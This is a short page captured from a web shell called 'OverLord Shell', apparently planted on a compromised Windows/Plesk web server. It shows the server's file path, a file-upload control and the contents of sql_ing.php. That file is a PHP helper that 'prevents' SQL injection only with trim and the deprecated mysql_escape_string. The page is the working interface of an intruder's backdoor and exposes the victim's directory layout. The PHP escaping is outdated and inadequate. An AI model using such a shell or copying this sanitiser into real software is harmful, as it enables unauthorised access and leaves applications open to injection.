OverLord Shell

Path : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/
File Upload :
Current File : G:/PleskVhosts/jaincensus.com/macciaweb.ultraliant.com/sql_ing.php

<?php 
function no_injection($string)
	{
		//$string = htmlspecialchars($string);	// convert html special char into url encode
		$string = trim($string);				// remove spaces from start and end 
		//$string = stripslashes($string);		// will remove slashes
		$string = mysql_escape_string($string);	// Escape a string for query
		//$string = addslashes($string);		// add slashes to cotted string 
		return $string;
	}
	?>

xRyukZ - Copyright 2k19